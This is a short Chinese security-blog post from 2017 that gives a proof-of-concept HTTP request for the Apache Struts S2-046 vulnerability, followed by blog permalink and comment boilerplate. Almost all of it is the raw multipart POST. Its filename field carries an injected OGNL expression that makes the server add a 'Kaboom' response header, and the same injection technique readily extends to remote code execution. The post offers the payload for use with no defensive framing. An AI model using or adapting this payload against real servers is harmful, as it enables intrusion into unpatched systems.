S2-046 PoC

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close
 
------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain
Kaboom 
 
------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

本文固定链接: https://www.unhonker.com/bug/1984.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2017年03月21日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: S2-046 PoC | 90' s Blog|关注网络信息安全
关键字:

S2-046 PoC:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!